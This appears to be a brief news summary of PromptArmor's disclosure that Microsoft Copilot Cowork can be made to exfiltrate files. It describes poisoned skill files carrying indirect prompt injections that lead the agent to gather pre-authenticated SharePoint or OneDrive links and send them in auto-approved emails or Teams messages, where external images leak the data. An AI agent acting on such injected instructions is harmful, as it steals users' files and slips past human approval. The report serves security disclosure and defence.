Microsoft Copilot Cowork Vulnerable to File Exfiltration
Original: Microsoft Copilot Cowork Exfiltrates Files
Why This Matters
Highlights enterprise AI security risks as agents gain broader system access
Security researchers found Microsoft Copilot Cowork can exfiltrate files via indirect prompt injection attacks. The vulnerability exploits automatic approval for emails and Teams messages sent to users, allowing attackers to steal data through compromised skills.
PromptArmor researchers discovered Microsoft Copilot Cowork is vulnerable to file exfiltration through indirect prompt injection. The attack exploits the fact that sending emails and Teams messages to active users bypasses human approval requirements, unlike other sensitive actions. Attackers can upload poisoned skill files containing prompt injections that manipulate the agent to retrieve pre-authenticated download links for files in SharePoint or OneDrive. When users open compromised messages, external images trigger network requests that exfiltrate data. The researchers achieved high success rates against state-of-the-art models including Claude Opus. Microsoft's documentation states Copilot asks permission for sensitive actions, but in practice, messages to active users execute immediately without approval settings users can modify.